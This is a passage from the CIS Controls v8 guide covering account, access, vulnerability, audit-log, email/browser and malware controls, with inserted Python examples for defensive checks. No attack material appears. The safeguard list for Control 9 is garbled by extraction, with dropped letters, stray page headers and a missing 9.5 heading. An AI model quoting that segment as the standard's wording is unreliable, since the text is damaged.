Use unique passwords for all enterprise assets. Best practice implementation includes, at a minimum, an 8-character password for accounts using MFA and a 14-character password for accounts not using MFA.


5.3 Disable Dormant Accounts (Users; Respond; IG1, IG2, IG3)
Delete or disable any dormant accounts after a period of 45 days of inactivity, where supported.



5.4 Restrict Administrator Privileges to Dedicated Administrator Accounts (Users; Protect; IG1, IG2, IG3)
Restrict administrator privileges to dedicated administrator accounts on enterprise assets. Conduct general computing activities, such as internet browsing, email, and productivity suite use, from the user’s primary, non-privileged account.

5.5 Establish and Maintain an Inventory of Service Accounts (Users; Identify; IG2, IG3)
Establish and maintain an inventory of service accounts. The inventory, at a minimum, must contain department owner, review date, and purpose. Perform service account reviews to validate that all active accounts are authorized, on a recurring schedule at a minimum quarterly, or more frequently.

5.6 Centralize Account Management (Users; Protect; IG2, IG3)
Centralize account management through a directory or identity service.



Control 06 Access Control Management
Safeguards: Total 8; IG1 5/8; IG2 7/8; IG3 8/8

Overview: Use processes and tools to create, assign, manage, and revoke access credentials and privileges for user, administrator, and service accounts for enterprise assets and software.

Why is this Control critical?

Where CIS Control 5 deals specifically with account management, CIS Control 6 focuses on managing what access these accounts have, ensuring users only have access to the data or enterprise assets appropriate for their role, and ensuring that there is strong authentication for critical or sensitive enterprise data or functions. Accounts should only have the minimal authorization needed for the role. Developing consistent access rights for each role and assigning roles to users is a best practice. Developing a program for complete provisioning and de-provisioning of access is also important. Centralizing this function is ideal.

There are some user activities that pose greater risk to an enterprise, either because they are accessed from untrusted networks, or performing administrator functions that allow the ability to add, change, or remove other accounts, or make configuration changes to operating systems or applications to make them less secure. This also enforces the importance of using MFA and Privileged Access Management (PAM) tools.

Some users have access to enterprise assets or data they do not need for their role; this might be due to an immature process that gives all users all access, or lingering access as users change roles within the enterprise over time. Local administrator privileges on users’ laptops are also an issue, as any malicious code installed or downloaded by the user can have greater impact on the enterprise asset when running as administrator. User, administrator, and service account access should be based on enterprise role and need.

Procedures and tools

There should be a process where privileges are granted and revoked for user accounts. This ideally is based on enterprise role and need through role-based access. Role-based access is a technique to define and manage access requirements for each account based on: need to know, least privilege, privacy requirements, and/or separation of duties. There are technology tools to help manage this process. However, there might be more granular or temporary access based on circumstance.

MFA should be universal for all privileged or administrator accounts. There are many tools that have smartphone applications to perform this function, and are easy to deploy. Using the number-generator feature is more secure than just sending a Short Messaging Service (SMS) message with a one-time code, or prompting a “push” alert for a user to accept. However, neither is recommended for privileged account MFA. PAM tools are available for privileged account control, and provide a one-time password that must be checked out for each use. For additional security in system administration, using “jump-boxes” or out of band terminal connections is recommended.

Comprehensive account de-provisioning is important. Many enterprises have repeatable consistent processes for removing access when employees leave the enterprise. However, that process is not always consistent for contractors, and must be included in the standard de-provisioning process. Enterprises should also inventory and track service accounts, as a common error is leaving clear text tokens or passwords in code, and posting to public cloud-based code repositories.

High-privileged accounts should not be used for day-to-day use, such as web surfing and email reading. Administrators should have separate accounts that do not have elevated privileges for daily office use, and should log into administrator accounts only when performing administrator functions requiring that level of authorization. Security personnel should periodically gather a list of running processes to determine whether any browsers or email readers are running with high privileges.
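The process check in the last sentence, as an added example that is not from the CIS Controls document: it reads output in the form `ps -eo user,pid,args` produces (the sample lines are constructed) and reports browsers or email readers that are running under a privileged account. The application names and privileged account names are assumptions to adapt to the environment.

```python
"""Flag browsers and email readers running with high privileges (added example,
not from the CIS Controls document).

Parses rows in the form produced by `ps -eo user,pid,args` (sample lines are
constructed below) and reports interactive applications owned by privileged
accounts. The name lists are assumptions to be adapted per environment.
"""
from typing import Dict, Iterable, List, Set, Tuple

# Interactive applications that should never run with elevated rights (assumed list).
INTERACTIVE_APPS: Set[str] = {"firefox", "chrome", "chromium", "safari", "thunderbird", "outlook", "mail"}
# Accounts considered privileged on the sampled platform (assumed list).
PRIVILEGED_USERS: Set[str] = {"root", "administrator"}


def parse_ps(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Parse `USER PID COMMAND` rows; the header and malformed lines are skipped."""
    rows = []
    for line in lines:
        parts = line.split(None, 2)
        if len(parts) != 3 or parts[0].upper() == "USER":
            continue
        user, pid, command = parts
        if not pid.isdigit():
            continue
        rows.append({"user": user, "pid": pid, "command": command.strip()})
    return rows


def privileged_interactive(lines: Iterable[str], privileged: Set[str] = PRIVILEGED_USERS,
                           apps: Set[str] = INTERACTIVE_APPS) -> List[Tuple[int, str, str]]:
    """Return (pid, user, command) for interactive apps running as a privileged user."""
    hits = []
    for row in parse_ps(lines):
        # First word of the command, without any directory prefix, e.g. /usr/lib/firefox/firefox.
        executable = row["command"].split()[0].rsplit("/", 1)[-1].lower()
        if row["user"].lower() in privileged and executable in apps:
            hits.append((int(row["pid"]), row["user"], row["command"]))
    return sorted(hits)


# Constructed sample process list.
SAMPLE_PS = """USER       PID COMMAND
root         1 /sbin/init
root       842 sshd: /usr/sbin/sshd -D
alice     2310 firefox
root      2451 /usr/lib/firefox/firefox
alice     2602 thunderbird
root      2715 outlook
bob       2901 chrome --profile-directory=Default
garbage line
""".splitlines()

if __name__ == "__main__":
    for pid, user, command in privileged_interactive(SAMPLE_PS):
        print(f"pid {pid}: {command} running as {user}")
```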

→ An excellent resource is the NIST® Digital Identity Guidelines – https://pages.nist.gov/800-63-3/

Safeguards (each entry lists asset type; security function; applicable Implementation Groups)

6.1 Establish an Access Granting Process (Users; Protect; IG1, IG2, IG3)
Establish and follow a process, preferably automated, for granting access to enterprise assets upon new hire, rights grant, or role change of a user.

6.2 Establish an Access Revoking Process (Users; Protect; IG1, IG2, IG3)
Establish and follow a process, preferably automated, for revoking access to enterprise assets, through disabling accounts immediately upon termination, rights revocation, or role change of a user. Disabling accounts, instead of deleting accounts, may be necessary to preserve audit trails.

6.3 Require MFA for Externally-Exposed Applications (Users; Protect; IG1, IG2, IG3)
Require all externally-exposed enterprise or third-party applications to enforce MFA, where supported. Enforcing MFA through a directory service or SSO provider is a satisfactory implementation of this Safeguard.




6.4 Require MFA for Remote Network Access (Users; Protect; IG1, IG2, IG3)
Require MFA for remote network access.

6.5 Require MFA for Administrative Access (Users; Protect; IG1, IG2, IG3)
Require MFA for all administrative access accounts, where supported, on all enterprise assets, whether managed on-site or through a third-party provider.

6.6 Establish and Maintain an Inventory of Authentication and Authorization Systems (Users; Identify; IG2, IG3)
Establish and maintain an inventory of the enterprise’s authentication and authorization systems, including those hosted on-site or at a remote service provider. Review and update the inventory, at a minimum, annually, or more frequently.

6.7 Centralize Access Control (Users; Protect; IG2, IG3)
Centralize access control for all enterprise assets through a directory service or SSO provider, where supported.

6.8 Define and Maintain Role-Based Access Control (Data; Protect; IG3)
Define and maintain role-based access control, through determining and documenting the access rights necessary for each role within the enterprise to successfully carry out its assigned duties. Perform access control reviews of enterprise assets to validate that all privileges are authorized, on a recurring schedule at a minimum annually, or more frequently.



Control 07 Continuous Vulnerability Management
Safeguards: Total 7; IG1 4/7; IG2 7/7; IG3 7/7

Overview: Develop a plan to continuously assess and track vulnerabilities on all enterprise assets within the enterprise’s infrastructure, in order to remediate, and minimize, the window of opportunity for attackers. Monitor public and private industry sources for new threat and vulnerability information.

Why is this Control critical?

Cyber defenders are constantly being challenged from attackers who are looking for vulnerabilities within their infrastructure to exploit and gain access. Defenders must have timely threat information available to them about: software updates, patches, security advisories, threat bulletins, etc., and they should regularly review their environment to identify these vulnerabilities before the attackers do. Understanding and managing vulnerabilities is a continuous activity, requiring focus of time, attention, and resources.

Attackers have access to the same information and can often take advantage of vulnerabilities more quickly than an enterprise can remediate. While there is a gap in time from a vulnerability being known to when it is patched, defenders can prioritize which vulnerabilities are most impactful to the enterprise, or likely to be exploited first due to ease of use. For example, when researchers or the community report new vulnerabilities, vendors have to develop and deploy patches, indicators of compromise (IOCs), and updates. Defenders need to assess the risk of the new vulnerability to the enterprise, regression-test patches, and install the patch.

There is never perfection in this process. Attackers might be using an exploit to a vulnerability that is not known within the security community. They might have developed an exploit to this vulnerability referred to as a “zero-day” exploit. Once the vulnerability is known in the community, the process mentioned above starts. Therefore, defenders must keep in mind that an exploit might already exist when the vulnerability is widely socialized. Sometimes vulnerabilities might be known within a closed community (e.g., vendor still developing a fix) for weeks, months, or years before it is disclosed publicly. Defenders have to be aware that there might always be vulnerabilities they cannot remediate, and therefore need to use other controls to mitigate.

Enterprises that do not assess their infrastructure for vulnerabilities and proactively address discovered flaws face a significant likelihood of having their enterprise assets compromised. Defenders face particular challenges in scaling remediation across an entire enterprise, and prioritizing actions with conflicting priorities, while not impacting the enterprise’s business or mission.

Procedures and tools

A large number of vulnerability scanning tools are available to evaluate the security configuration of enterprise assets. Some enterprises have also found commercial services using remotely managed scanning appliances to be effective. To help standardize the definitions of discovered vulnerabilities across an enterprise, it is preferable to use vulnerability scanning tools that map vulnerabilities to one or more of the following industry-recognized vulnerability, configuration and platform classification schemes and languages: Common Vulnerabilities and Exposures (CVE®), Common Configuration Enumeration (CCE), Open Vulnerability and Assessment Language (OVAL®), Common Platform Enumeration (CPE), Common Vulnerability Scoring System (CVSS), and/or Extensible Configuration Checklist Description Format (XCCDF). These schemes and languages are components of SCAP.

→ More information on SCAP can be found here – https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-126r3.pdf

The frequency of scanning activities should increase as the diversity of an enterprise’s assets increases to account for the varying patch cycles of each vendor. Advanced vulnerability scanning tools can be configured with user credentials to authenticate into enterprise assets and perform more comprehensive assessments. These are called “authenticated scans.”

In addition to the scanning tools that check for vulnerabilities and misconfigurations across the network, various free and commercial tools can evaluate security settings and configurations of enterprise assets. Such tools can provide fine-grained insight into unauthorized changes in configuration or the inadvertent introduction of security weaknesses from administrators.

Effective enterprises link their vulnerability scanners with problem-ticketing systems that track and report progress on fixing vulnerabilities. This can help highlight unmitigated critical vulnerabilities to senior management to ensure they are resolved. Enterprises can also track how long it took to remediate a vulnerability after it was identified, or after a patch was issued. These can support internal or industry compliance requirements. Some mature enterprises will go over these reports in IT security steering committee meetings, which bring leaders from IT and the business together to prioritize remediation efforts based on business impact.

In selecting which vulnerabilities to fix, or patches to apply, an enterprise should augment NIST’s Common Vulnerability Scoring System (CVSS) with data concerning the likelihood of a threat actor using a vulnerability, or potential impact of an exploit to the enterprise. Information on the likelihood of exploitation should also be periodically updated based on the most current threat information. For example, the release of a new exploit, or new intelligence relating to exploitation of the vulnerability, should change the priority through which the vulnerability should be considered for patching. Various commercial systems are available to allow an enterprise to automate and maintain this process in a scalable manner.

The most effective vulnerability scanning tools compare the results of the current scan with previous scans to determine how the vulnerabilities in the environment have changed over time. Security personnel use these features to conduct vulnerability trending from month to month.
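The three procedures above (tracking time to remediate, augmenting CVSS with exploitation likelihood, and comparing the current scan with the previous one) can be combined in one script. As an added example that is not from the CIS Controls document, the following diffs two scan result sets, ages each open finding from the date it was first seen, and ranks open findings by CVSS plus an exploitation-intelligence bonus and an overdue bonus; the scoring weights, the 30-day SLA, and the "CVE-0000-000N" identifiers are constructed placeholders, not real vulnerability data.

```python
"""Scan-to-scan vulnerability trending and remediation priority (added example,
not from the CIS Controls document).

Compares the previous and current scan results to report new, persisting and
resolved findings, tracks how long each open finding has been known, and ranks
open findings by a priority that augments the CVSS base score with a
known-exploitation flag and an overdue flag. All findings, scores and the
CVE-style identifiers are constructed placeholders, not real vulnerability data.
"""
from dataclasses import dataclass
from datetime import date
from typing import Dict, Iterable, List, Set, Tuple

Key = Tuple[str, str]  # (asset, vulnerability identifier)


@dataclass(frozen=True)
class Finding:
    asset: str
    vuln_id: str
    cvss: float   # CVSS base score as reported by the scanner
    seen: date    # date of the scan that reported it


def diff_scans(previous: Iterable[Finding], current: Iterable[Finding]):
    """Return (new, persisting, resolved) keys between two scans."""
    prev = {(f.asset, f.vuln_id) for f in previous}
    curr = {(f.asset, f.vuln_id) for f in current}
    return sorted(curr - prev), sorted(curr & prev), sorted(prev - curr)


def prioritize(previous: Iterable[Finding], current: Iterable[Finding],
               known_exploited: Set[str], today: date, sla_days: int = 30) -> List[dict]:
    """Rank open findings: CVSS, +3.0 if exploitation is known, +1.0 if older than the SLA.

    The weights and SLA are assumptions for this example. First-seen dates carry
    over from earlier scans so persisting findings keep ageing.
    """
    previous, current = list(previous), list(current)
    first_seen: Dict[Key, date] = {}
    for f in previous + current:
        k = (f.asset, f.vuln_id)
        first_seen[k] = min(first_seen.get(k, f.seen), f.seen)
    prev_keys = {(f.asset, f.vuln_id) for f in previous}
    ranked = []
    for f in current:
        k = (f.asset, f.vuln_id)
        age = (today - first_seen[k]).days
        score = f.cvss
        if f.vuln_id in known_exploited:
            score += 3.0
        if age > sla_days:
            score += 1.0
        ranked.append({"asset": f.asset, "vuln_id": f.vuln_id, "cvss": f.cvss,
                       "status": "persisting" if k in prev_keys else "new",
                       "age_days": age, "score": round(score, 1)})
    return sorted(ranked, key=lambda r: (-r["score"], r["asset"], r["vuln_id"]))


# Constructed sample scans; "CVE-0000-000N" are placeholders, not real CVE ids.
PREVIOUS = [
    Finding("web01", "CVE-0000-0001", 9.8, date(2024, 1, 15)),
    Finding("web01", "CVE-0000-0002", 5.3, date(2024, 1, 15)),
    Finding("db01", "CVE-0000-0003", 7.5, date(2024, 1, 15)),
]
CURRENT = [
    Finding("web01", "CVE-0000-0001", 9.8, date(2024, 2, 20)),
    Finding("db01", "CVE-0000-0003", 7.5, date(2024, 2, 20)),
    Finding("db01", "CVE-0000-0004", 8.8, date(2024, 2, 20)),
]
KNOWN_EXPLOITED = {"CVE-0000-0004"}  # placeholder exploitation intelligence
TODAY = date(2024, 2, 20)

if __name__ == "__main__":
    new, persisting, resolved = diff_scans(PREVIOUS, CURRENT)
    print("new:", new, "persisting:", persisting, "resolved:", resolved)
    for row in prioritize(PREVIOUS, CURRENT, KNOWN_EXPLOITED, TODAY):
        print(row)
```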

Finally, there should be a quality assurance process to verify configuration updates, or that patches are implemented correctly and across all relevant enterprise assets.

Safeguards (each entry lists asset type; security function; applicable Implementation Groups)

7.1 Establish and Maintain a Vulnerability Management Process (Applications; Protect; IG1, IG2, IG3)
Establish and maintain a documented vulnerability management process for enterprise assets. Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.

7.2 Establish and Maintain a Remediation Process (Applications; Respond; IG1, IG2, IG3)
Establish and maintain a risk-based remediation strategy documented in a remediation process, with monthly, or more frequent, reviews.

7.3 Perform Automated Operating System Patch Management (Applications; Protect; IG1, IG2, IG3)
Perform operating system updates on enterprise assets through automated patch management on a monthly, or more frequent, basis.

7.4 Perform Automated Application Patch Management (Applications; Protect; IG1, IG2, IG3)
Perform application updates on enterprise assets through automated patch management on a monthly, or more frequent, basis.

7.5 Perform Automated Vulnerability Scans of Internal Enterprise Assets (Applications; Identify; IG2, IG3)
Perform automated vulnerability scans of internal enterprise assets on a quarterly, or more frequent, basis. Conduct both authenticated and unauthenticated scans, using a SCAP-compliant vulnerability scanning tool.

7.6 Perform Automated Vulnerability Scans of Externally-Exposed Enterprise Assets (Applications; Identify; IG2, IG3)
Perform automated vulnerability scans of externally-exposed enterprise assets using a SCAP-compliant vulnerability scanning tool. Perform scans on a monthly, or more frequent, basis.

7.7 Remediate Detected Vulnerabilities (Applications; Respond; IG2, IG3)
Remediate detected vulnerabilities in software through processes and tooling on a monthly, or more frequent, basis, based on the remediation process.



Control 08 Audit Log Management
Safeguards: Total 12; IG1 3/12; IG2 11/12; IG3 12/12

Overview: Collect, alert, review, and retain audit logs of events that could help detect, understand, or recover from an attack.

Why is this Control critical?

Log collection and analysis is critical for an enterprise’s ability to detect malicious activity quickly. Sometimes audit records are the only evidence of a successful attack. Attackers know that many enterprises keep audit logs for compliance purposes, but rarely analyze them. Attackers use this knowledge to hide their location, malicious software, and activities on victim machines. Due to poor or nonexistent log analysis processes, attackers sometimes control victim machines for months or years without anyone in the target enterprise knowing.

There are two types of logs that are generally treated and often configured independently: system logs and audit logs. System logs typically provide system-level events that show various system process start/end times, crashes, etc. These are native to systems, and take less configuration to turn on. Audit logs typically include user-level events—when a user logged in, accessed a file, etc.—and take more planning and effort to set up.

Logging records are also critical for incident response. After an attack has been detected, log analysis can help enterprises understand the extent of an attack. Complete logging records can show, for example, when and how the attack occurred, what information was accessed, and if data was exfiltrated. Retention of logs is also critical in case a follow-up investigation is required or if an attack remained undetected for a long period of time.

Procedures and tools

Most enterprise assets and software offer logging capabilities. Such logging should be activated, with logs sent to centralized logging servers. Firewalls, proxies, and remote access systems (Virtual Private Network (VPN), dial-up, etc.) should all be configured for verbose logging where beneficial. Retention of logging data is also important in the event an incident investigation is required.

Furthermore, all enterprise assets should be configured to create access control logs when a user attempts to access resources without the appropriate privileges. To evaluate whether such logging is in place, an enterprise should periodically scan through its logs and compare them with the enterprise asset inventory assembled as part of CIS Control 1, in order to ensure that each managed asset actively connected to the network is periodically generating logs.
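The comparison described above, as an added example that is not from the CIS Controls document: it reads centralized log lines in a simplified "timestamp hostname message" form (the lines and the inventory are constructed), records the latest entry per host, and reports connected inventory assets with no entries, assets whose last entry is older than the allowed silence, and log sources that are not in the inventory at all. The log line format and the 24-hour silence threshold are assumptions.

```python
"""Log coverage check against the asset inventory (added example, not from the
CIS Controls document).

Reads centralized log lines (a constructed sample in a simplified
"<ISO-8601 UTC timestamp> <hostname> <message>" form), records the latest
entry per host, and compares that with the enterprise asset inventory from
CIS Control 1: connected assets with no entries, assets whose last entry is
older than the allowed silence, and log sources absent from the inventory.
"""
import re
from datetime import datetime, timedelta
from typing import Dict, Iterable, List

LOG_RE = re.compile(r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z)\s+(?P<host>\S+)\s")


def latest_entry_per_host(lines: Iterable[str]) -> Dict[str, datetime]:
    """Map each log-producing hostname to the timestamp of its most recent line."""
    latest: Dict[str, datetime] = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable lines are ignored, not counted as coverage
        ts = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%SZ")
        host = m.group("host").lower()
        if host not in latest or ts > latest[host]:
            latest[host] = ts
    return latest


def logging_coverage(inventory: List[dict], lines: Iterable[str], now: datetime,
                     max_silence: timedelta = timedelta(hours=24)) -> Dict[str, List[str]]:
    """Compare log sources with the asset inventory (records carry 'hostname' and 'connected')."""
    latest = latest_entry_per_host(lines)
    known = {a["hostname"].lower() for a in inventory}
    silent, stale = [], []
    for asset in inventory:
        if not asset["connected"]:
            continue  # offline or retired assets are not expected to log
        host = asset["hostname"].lower()
        seen = latest.get(host)
        if seen is None:
            silent.append(host)          # managed, connected, but never seen in the logs
        elif now - seen > max_silence:
            stale.append(host)           # was logging, but has gone quiet
    unknown = sorted(h for h in latest if h not in known)  # logging, but not inventoried
    return {"silent": sorted(silent), "stale": sorted(stale), "unknown": unknown}


# Constructed sample inventory and log lines.
INVENTORY = [
    {"hostname": "web01", "connected": True},
    {"hostname": "db01", "connected": True},
    {"hostname": "hr-laptop-07", "connected": True},
    {"hostname": "old-print", "connected": False},
]
LOG_LINES = """2024-03-01T08:00:12Z web01 sshd[1042]: Accepted publickey for deploy from 10.0.0.5 port 51234
2024-03-01T08:05:40Z WEB01 nginx: 10.0.0.9 GET /login 200
2024-02-27T22:11:03Z db01 postgres[221]: connection authorized: user=app database=orders
2024-03-01T09:14:55Z lab-pi sudo: pam_unix(sudo:session): session opened for user root
this line is not in the expected format
""".splitlines()
NOW = datetime(2024, 3, 1, 10, 0, 0)


def run_sample() -> Dict[str, List[str]]:
    return logging_coverage(INVENTORY, LOG_LINES, NOW)


if __name__ == "__main__":
    print(run_sample())  # {'silent': ['hr-laptop-07'], 'stale': ['db01'], 'unknown': ['lab-pi']}
```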

Safeguards (each entry lists asset type; security function; applicable Implementation Groups)

8.1 Establish and Maintain an Audit Log Management Process (Network; Protect; IG1, IG2, IG3)
Establish and maintain an audit log management process that defines the enterprise’s logging requirements. At a minimum, address the collection, review, and retention of audit logs for enterprise assets. Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.

8.2 Collect Audit Logs (Network; Detect; IG1, IG2, IG3)
Collect audit logs. Ensure that logging, per the enterprise’s audit log management process, has been enabled across enterprise assets.

8.3 Ensure Adequate Audit Log Storage (Network; Protect; IG1, IG2, IG3)
Ensure that logging destinations maintain adequate storage to comply with the enterprise’s audit log management process.

8.4 Standardize Time Synchronization (Network; Protect; IG2, IG3)
Standardize time synchronization. Configure at least two synchronized time sources across enterprise assets, where supported.



8.5 Collect Detailed Audit Logs (Network; Detect; IG2, IG3)
Configure detailed audit logging for enterprise assets containing sensitive data. Include event source, date, username, timestamp, source addresses, destination addresses, and other useful elements that could assist in a forensic investigation.

8.6 Collect DNS Query Audit Logs (Network; Detect; IG2, IG3)
Collect DNS query audit logs on enterprise assets, where appropriate and supported.

8.7 Collect URL Request Audit Logs (Network; Detect; IG2, IG3)
Collect URL request audit logs on enterprise assets, where appropriate and supported.

8.8 Collect Command-Line Audit Logs (Devices; Detect; IG2, IG3)
Collect command-line audit logs. Example implementations include collecting audit logs from PowerShell®, BASH™, and remote administrative terminals.

8.9 Centralize Audit Logs (Network; Detect; IG2, IG3)
Centralize, to the extent possible, audit log collection and retention across enterprise assets.

8.10 Retain Audit Logs (Network; Protect; IG2, IG3)
Retain audit logs across enterprise assets for a minimum of 90 days.

8.11 Conduct Audit Log Reviews (Network; Detect; IG2, IG3)
Conduct reviews of audit logs to detect anomalies or abnormal events that could indicate a potential threat. Conduct reviews on a weekly, or more frequent, basis.

8.12 Collect Service Provider Logs (Data; Detect; IG3)
Collect service provider logs, where supported. Example implementations include collecting authentication and authorization events, data creation and disposal events, and user management events.


Control 09 Email and Web Browser Protections
Safeguards: Total 7; IG1 2/7; IG2 6/7; IG3 7/7

Overview: Improve protections and detections of threats from email and web vectors, as these are opportunities for attackers to manipulate human behavior through direct engagement.

Why is this Control critical?

Web browsers and email clients are very common points of entry for attackers because of their direct interaction with users inside an enterprise. Content can be crafted to entice or spoof users into disclosing credentials, providing sensitive data, or providing an open channel to allow attackers to gain access, thus increasing risk to the enterprise. Since email and web are the main means that users interact with external and untrusted users and environments, these are prime targets for both malicious code and social engineering. Additionally, as enterprises move to web-based email, or mobile email access, users no longer use traditional full-featured email clients, which provide embedded security controls like connection encryption, strong authentication, and phishing reporting buttons.

Procedures and tools

Web Browser

Cybercriminals can exploit web browsers in multiple ways. If they have access to exploits of vulnerable browsers, they can craft malicious webpages that can exploit those vulnerabilities when browsed with an insecure, or unpatched, browser. Alternatively, they can try to target any number of common web browser third-party plugins that may allow them to hook into the browser or even directly into the operating system or application. These plugins, much like any other software within an environment, need to be reviewed for vulnerabilities, kept up-to-date with latest patches or versions, and controlled. Many come from untrusted sources, and some are even written to be malicious. Therefore, it is best to prevent users from intentionally or unintentionally installing malware that might be hiding in some of these plugins, extensions, and add-ons. Simple configuration updates to the browser can make it much harder for malware to get installed through reducing the ability of installing add-ons/plugins/extensions and preventing specific types of content from automatically executing.



Most popular browsers employ a database of phishing and/or malware sites to protect against the most common threats. A best practice is to enable these content filters and turn on the pop-up blockers. Pop-ups are not only annoying; they can also host embedded malware directly or lure users into clicking links using social engineering tricks. To help enforce blocking of known malicious domains, also consider subscribing to DNS filtering services to block attempts to access these websites at the network level.

Email

Email represents one of the most interactive ways humans work with enterprise assets; training and encouraging the right behavior is just as important as the technical settings. Email is the most common threat vector against enterprises through tactics such as phishing and Business Email Compromise (BEC).

Using a spam-filtering tool and malware scanning at the email gateway reduces the number of malicious emails and attachments that come into the enterprise’s network. Initiating Domain-based Message Authentication, Reporting, and Conformance (DMARC) helps reduce spam and phishing activities. Installing an encryption tool to secure email and communications adds another layer of user and network-based security. In addition to blocking based on the sender, it is also worthwhile to only allow certain file types that users need for their jobs. This will require coordination with different business units to understand what types of files they receive via email to ensure that there is not an interruption to their processes.

Since phishing email techniques are ever evolving to get past Something Posing as Mail (SPAM) filter rules, it is important to train users on how to identify phishing, and to notify IT Security when they see one. There are many platforms that perform phishing tests against users to help educate them on different examples, and track their improvement over time. Crowd-sourcing this knowledge into notifying IT Security teams of phishing helps improve the protections and detections of email-based threats.

Safeguards (each entry lists asset type; security function; applicable Implementation Groups)

9.1 Ensure Use of Only Fully Supported Browsers and Email Clients (Applications; Protect; IG1, IG2, IG3)
Ensure only fully supported browsers and email clients are allowed to execute in the enterprise, only using the latest version of browsers and email clients provided through the vendor.

9.2 Use DNS Filtering Services (Network; Protect; IG1, IG2, IG3)
Use DNS filtering services on all enterprise assets to block access to known malicious domains.

9.3 Maintain and Enforce Network-Based URL Filters (Network; Protect; IG2, IG3)
Enforce and update network-based URL filters to limit an enterprise asset from connecting to potentially malicious or unapproved websites. Example implementations include category-based filtering, reputation-based filtering, or through the use of block lists. Enforce filters for all enterprise assets.

9.4 Restrict Unnecessary or Unauthorized Browser and Email Applica ons -Protect- ••
CIS Controls v8 Control 09: Email and Web Browser Protec ons Page 36
Client Extensions
Restrict, either through uninstalling or disabling, any unauthorized or unnecessary browser or email client plugins,
extensions, and add-on applica ons.

To lower the chance of spoofed or modified emails from valid domains, implement DMARC policy and verifica on, star ng
with implemen ng the Sender Policy
Framework (SPF) and the DomainKeys Iden fied
Mail (DKIM) standards.

9.6 Block Unnecessary File Types Network -Protect- ••


Block unnecessary file types a emp ng to enter the enterprise’s email gateway.

9.7 Deploy and Maintain Email Server An -Malware Protec ons Network -Protect- •
Deploy and maintain email server an -malware protec ons, such as a achment scanning and/or sandboxing.
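Safeguard 9.5 and the procedures text above give the deployment order (SPF, then DKIM, then DMARC); what a practitioner wants is a way to confirm the published records actually enforce anything, because a DMARC record with p=none or an SPF record ending in +all is deployed but protects nothing. The following is an added example in Python, not from the CIS document. A real check would query DNS TXT records; to run offline it uses a constructed in-memory zone with hypothetical records, and the DKIM selector names it tries are an assumption.

```python
"""Check the published SPF, DKIM and DMARC records for a domain (added
example, not from the CIS document). Real deployments query DNS; to run
offline this uses a constructed in-memory zone with hypothetical records.
"""
import re

# Constructed zone data for two hypothetical domains.
ZONE = {
    "example.org": ["v=spf1 include:_spf.mail.example.net ip4:203.0.113.0/24 -all"],
    "s1._domainkey.example.org": ["v=DKIM1; k=rsa; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A..."],
    "_dmarc.example.org": ["v=DMARC1; p=reject; rua=mailto:dmarc@example.org; pct=100"],
    "weak.example": ["v=spf1 +all"],
    "_dmarc.weak.example": ["v=DMARC1; p=none"],
}

def txt_records(name):
    """Stand-in for a DNS TXT lookup against the constructed zone."""
    return ZONE.get(name, [])

def parse_spf(domain):
    """Return {'terms': [...], 'all': '-all'|'~all'|'?all'|'+all'|None}, or None if absent/duplicated."""
    recs = [r for r in txt_records(domain) if r.startswith("v=spf1")]
    if len(recs) != 1:        # RFC 7208: more than one SPF record is a permanent error
        return None
    terms = recs[0].split()[1:]
    return {"terms": terms, "all": next((t for t in terms if t.endswith("all")), None)}

def parse_dmarc(domain):
    """Return the DMARC tag dict, or None if the record is absent or duplicated."""
    recs = [r for r in txt_records(f"_dmarc.{domain}") if r.startswith("v=DMARC1")]
    if len(recs) != 1:
        return None
    return {k: v.strip() for k, v in re.findall(r"([a-z]+)=([^;]+)", recs[0])}

def dkim_selectors(domain, selectors=("s1", "default", "selector1")):
    """Selectors (from the assumed list) that publish a DKIM key for the domain."""
    return [s for s in selectors
            if any(r.startswith("v=DKIM1") for r in txt_records(f"{s}._domainkey.{domain}"))]

def assess(domain):
    """Return findings in deployment order (SPF, DKIM, DMARC); empty means sound."""
    findings = []
    spf = parse_spf(domain)
    if spf is None:
        findings.append("SPF: missing or duplicated record")
    elif spf["all"] in (None, "+all", "?all"):
        findings.append(f"SPF: '{spf['all']}' passes any sender; end with -all or ~all")
    if not dkim_selectors(domain):
        findings.append("DKIM: no known selector publishes a key")
    dmarc = parse_dmarc(domain)
    if dmarc is None:
        findings.append("DMARC: missing or duplicated record")
    else:
        if dmarc.get("p") == "none":
            findings.append("DMARC: p=none only monitors; move to quarantine or reject")
        if "rua" not in dmarc:
            findings.append("DMARC: no rua= address, so aggregate reports go nowhere")
    return findings

if __name__ == "__main__":
    for d in ("example.org", "weak.example"):
        print(d, assess(d) or ["ok"])
```

Receiving-side verification (checking SPF alignment and DKIM signatures on inbound mail) is done by the gateway; this check covers the sending-side half that the enterprise itself controls, which is where most DMARC rollouts stall at p=none.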



Control 10: Malware Defenses
Safeguards: 7 total; IG1 3/7; IG2 7/7; IG3 7/7

Overview: Prevent or control the installation, spread, and execution of malicious
applications, code, or scripts on enterprise assets.

Why is this Control critical?

Malicious software (sometimes categorized as viruses or Trojans) is an integral and dangerous
aspect of internet threats. It can have many purposes, from capturing credentials, stealing
data, and identifying other targets within the network, to encrypting or destroying data.
Malware is ever-evolving and adaptive, as modern variants leverage machine learning
techniques.

Malware enters an enterprise through vulnerabilities within the enterprise on end-user
devices, email attachments, webpages, cloud services, mobile devices, and removable media.
Malware often relies on insecure end-user behavior, such as clicking links, opening
attachments, installing software or profiles, or inserting Universal Serial Bus (USB) flash drives.
Modern malware is designed to avoid, deceive, or disable defenses.

Malware defenses must be able to operate in this dynamic environment through automation,
timely and rapid updating, and integration with other processes like vulnerability
management and incident response. They must be deployed at all possible entry points and
enterprise assets to detect, prevent the spread of, or control the execution of malicious
software or code.

Procedures and tools

Effective malware protection includes traditional endpoint malware prevention and detection
suites. To ensure malware IOCs are up-to-date, enterprises can receive automated updates
from the vendor to enrich other vulnerability or threat data. These tools are best managed
centrally to provide consistency across the infrastructure.

Being able to block or identify malware is only part of this CIS Control; there is also a focus on
centrally collecting the logs to support alerting, identification, and incident response. As
malicious actors continue to develop their methodologies, many are starting to take a "living-
off-the-land" (LotL) approach to minimize the likelihood of being caught. This approach refers
to attacker behavior that uses tools or features that already exist in the target environment,
